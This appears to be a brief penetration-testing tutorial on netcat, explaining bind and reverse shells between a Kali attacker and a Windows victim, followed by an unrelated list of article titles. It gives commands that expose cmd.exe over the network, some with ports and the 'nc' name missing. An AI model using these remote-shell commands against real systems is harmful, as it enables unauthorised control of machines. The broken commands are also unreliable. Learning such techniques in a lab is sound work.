Introduction to Netcat

  • Connecting va Listening
  • Bind Shells
    • Attacker connects to victim on listening port
  • Reverse Shells
    • Victim connects to attacker on listening port

Basic usage:

nc -nv IP Port

Bind Shell:

1.On the Windows nc tool.

-nvlp  -e cmd.exe

2. On the Kali nc tool.

nc -nv 10.0.0.16 

3.Result

Reverse Shells

1.On the Kali nc tool.

nc -nvlp 

2.On the Windows nc tool.

-nvlp  -e cmd.exe

3. Result

最新文章

  1. 打气筒的Api
  2. 深入理解java虚拟机【垃圾回收算法】
  3. Debian 8 在虚拟环境中安装kivy
  4. Ubuntu 12.04 root默认密码? 如何使用root登录?
  5. iOS 地图坐标系之间的转换WGS-84世界标准坐标、GCJ-02中国国测局(火星坐标,高德地图)、BD-09百度坐标系转换
  6. 【HDOJ】3316 Mine sweeping
  7. 星际争霸反作弊AG对战平台_支持108,113
  8. 对List对象按照某个成员变量进行排序
  9. cocos2dx CCEditBox
  10. Adobe Flash Player已经终止一项可能不安全的操作,解决方案
  11. Bash+R: howto pass parameters from bash script to R(转)
  12. windows下将mysql加入环境变量
  13. Mysql 存储过程查询结果赋值到变量的方法
  14. 数据库 数据去重并取id最大的数据sql
  15. Learning-Python【10】:函数初识
  16. php文件与HTML页面的数据交互
  17. findbugs的使用
  18. Swift Assert 断言
  19. Putty CentOS SSH 总是自动断开连接
  20. Mongodb集群节点故障恢复场景分析(转)

热门文章

  1. CRC16冗余循环检测计算器-好用。modbus RTU
  2. c语言中的c语言中realloc()函数解析
  3. cn.arxiv.org || https://arxiv.org/xxxx 访问失败
  4. 字节流,读取 a.txt 文件内容,并打印出来
  5. LeetCode65. 有效数字
  6. sorted 函数及小练习
  7. .gitkeep文件
  8. django.core.exceptions.ImproperlyConfigured: mysqlclient 1.3.13 or newer is required; you have 0.9.2的最佳处理方法,亲测可用
  9. 大多数人可能都不会使用socketTimeout,看了底层才知道一直都做错了
  10. CSS position 属性_css中常用position定位属性介绍